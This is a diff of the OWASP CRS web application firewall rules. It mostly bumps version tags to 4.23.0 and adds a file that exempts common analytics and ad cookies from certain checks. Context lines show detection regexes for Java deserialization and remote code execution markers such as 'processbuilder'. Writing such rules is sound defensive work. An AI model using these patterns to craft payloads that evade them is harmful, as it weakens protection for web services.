-# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -13,8 +13,8 @@ # # Many rules check request bodies, use "SecRequestBodyAccess On" to enable it on main modsecurity configuration file. -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -46,7 +46,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/137/6',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -78,7 +78,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/248',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS|XML:/*|XML://@* "@rx (?i)(?:unmarshaller|base64data|java\.)" \ @@ -103,7 +103,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/248',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS "@rx (?:runtime|processbuilder)" \ @@ -135,7 +135,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/248',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -174,7 +174,7 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -222,14 +222,14 @@ SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/137/6',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # @@ -260,7 +260,7 @@ SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/137/6',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -292,7 +292,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/248',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -313,7 +313,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/248',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -334,7 +334,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/248',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -358,7 +358,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/248',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -383,14 +383,14 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/248',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # @@ -417,14 +417,14 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/248',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # @@ -453,7 +453,7 @@ SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/137/6',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" diff --git a/rules/REQUEST-949-BLOCKING-EVALUATION.conf b/rules/REQUEST-949-BLOCKING-EVALUATION.conf index 05b290b300..2023aee486 100644 --- a/rules/REQUEST-949-BLOCKING-EVALUATION.conf +++ b/rules/REQUEST-949-BLOCKING-EVALUATION.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -24,7 +24,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 1" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ @@ -34,7 +34,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ @@ -44,7 +44,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ @@ -54,7 +54,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ @@ -64,7 +64,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ @@ -74,7 +74,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ @@ -84,7 +84,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ @@ -94,7 +94,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" # at start of phase 2, we reset the aggregate scores to 0 to prevent duplicate counting of per-PL scores @@ -106,7 +106,7 @@ SecAction \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_inbound_anomaly_score=0'" SecAction \ @@ -116,7 +116,7 @@ SecAction \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.detection_inbound_anomaly_score=0'" # Summing up the blocking and detection anomaly scores in phase 2 @@ -128,7 +128,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 1" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ @@ -138,7 +138,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ @@ -148,7 +148,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ @@ -158,7 +158,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ @@ -168,7 +168,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ @@ -178,7 +178,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ @@ -188,7 +188,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ @@ -198,7 +198,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" @@ -217,7 +217,7 @@ SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_thresh msg:'Inbound Anomaly Score Exceeded in phase 1 (Total Score: %{TX.BLOCKING_INBOUND_ANOMALY_SCORE})',\ tag:'anomaly-evaluation',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ chain" SecRule TX:EARLY_BLOCKING "@eq 1" @@ -230,34 +230,34 @@ SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_thresh msg:'Inbound Anomaly Score Exceeded (Total Score: %{TX.BLOCKING_INBOUND_ANOMALY_SCORE})',\ tag:'anomaly-evaluation',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0'" + ver:'OWASP_CRS/4.23.0'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-999-COMMON-EXCEPTIONS-AFTER.conf b/rules/REQUEST-999-COMMON-EXCEPTIONS-AFTER.conf new file mode 100644 index 0000000000..03945486f6 --- /dev/null +++ b/rules/REQUEST-999-COMMON-EXCEPTIONS-AFTER.conf @@ -0,0 +1,99 @@ +# ------------------------------------------------------------------------ +# OWASP CRS ver.4.23.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2026 CRS project. All rights reserved. +# +# The OWASP CRS is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# This file is used as an exception mechanism to remove common false positives +# that may be encountered. This file does not contain any runtime rule-exclusions +# and so it must loaded after all the request rules have been created. + +# To have a standard order, please: +# +# 1. Keep all the exceptions that target the same cookie (or cookie regexp together) +# 2. Order them by rule id. +# 3. Add a blank line when the cookie/cookie regexp changes, so it shows visually + +# Google Analytics Cookies +# Matches: +# _ga +# _ga_5WLQM4K1ZX +SecRuleUpdateTargetById 932240 "!REQUEST_COOKIES:/^_ga(?:_\w+)?$/" +SecRuleUpdateTargetById 941100 "!REQUEST_COOKIES:/^_ga(?:_\w+)?$/" +SecRuleUpdateTargetById 942290 "!REQUEST_COOKIES:/^_ga(?:_\w+)?$/" +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:/^_ga(?:_\w+)?$/" +SecRuleUpdateTargetById 942550 "!REQUEST_COOKIES:/^_ga(?:_\w+)?$/" + +# Google Ads Cookie +SecRuleUpdateTargetById 941100 "!REQUEST_COOKIES:__gads" +SecRuleUpdateTargetById 942290 "!REQUEST_COOKIES:__gads" +SecRuleUpdateTargetById 942420 "!REQUEST_COOKIES:__gads" +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:__gads" +SecRuleUpdateTargetById 942550 "!REQUEST_COOKIES:__gads" +SecRuleUpdateTargetById 942420 "!REQUEST_COOKIES:__gpi" +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:__gpi" + +# Google Funding Choices cookie +SecRuleUpdateTargetById 941100 "!REQUEST_COOKIES:FCCDCF" +SecRuleUpdateTargetById 942290 "!REQUEST_COOKIES:FCCDCF" +SecRuleUpdateTargetById 942340 "!REQUEST_COOKIES:FCCDCF" +SecRuleUpdateTargetById 942370 "!REQUEST_COOKIES:FCCDCF" +SecRuleUpdateTargetById 942420 "!REQUEST_COOKIES:FCCDCF" +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:FCCDCF" +SecRuleUpdateTargetById 942490 "!REQUEST_COOKIES:FCCDCF" +SecRuleUpdateTargetById 942550 "!REQUEST_COOKIES:FCCDCF" + +# Security cookie for Google Ads +SecRuleUpdateTargetById 942420 "!REQUEST_COOKIES:__eoi" +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:__eoi" + +# Google Analytics Funding Choices cookie +SecRuleUpdateTargetById 942340 "!REQUEST_COOKIES:FCNEC" +SecRuleUpdateTargetById 942370 "!REQUEST_COOKIES:FCNEC" +SecRuleUpdateTargetById 942420 "!REQUEST_COOKIES:FCNEC" +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:FCNEC" + +# Prebid.js share cookie +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:sharedid" + +# Microsoft Clarity tracking cookie +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:_clsk" + +# Microsoft Clarity marketing cookie +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:_clck" + +# AWS Load balancer cookie +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:_awl" + +# Prebid.js Cookie +# Matches: +# pbjs-id5id +SecRuleUpdateTargetById 941100 "!REQUEST_COOKIES:/^pbjs-\w+$/" +SecRuleUpdateTargetById 942200 "!REQUEST_COOKIES:/^pbjs-\w+$/" +SecRuleUpdateTargetById 942290 "!REQUEST_COOKIES:/^pbjs-\w+$/" +SecRuleUpdateTargetById 942340 "!REQUEST_COOKIES:/^pbjs-\w+$/" +SecRuleUpdateTargetById 942370 "!REQUEST_COOKIES:/^pbjs-\w+$/" +SecRuleUpdateTargetById 942420 "!REQUEST_COOKIES:/^pbjs-\w+$/" +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:/^pbjs-\w+$/" +SecRuleUpdateTargetById 942490 "!REQUEST_COOKIES:/^pbjs-\w+$/" +SecRuleUpdateTargetById 942550 "!REQUEST_COOKIES:/^pbjs-\w+$/" + +# Matomo Referer Cookie +SecRuleUpdateTargetById 941320 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 941330 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 941340 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 942370 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 942380 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 942390 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 942400 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 942410 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 942420 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 942421 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 942440 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 942450 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 942470 "!REQUEST_COOKIES:/^_pk_ref/" +SecRuleUpdateTargetById 942480 "!REQUEST_COOKIES:/^_pk_ref/" diff --git a/rules/RESPONSE-950-DATA-LEAKAGES.conf b/rules/RESPONSE-950-DATA-LEAKAGES.conf index d2db41a08e..f2a9226e3c 100644 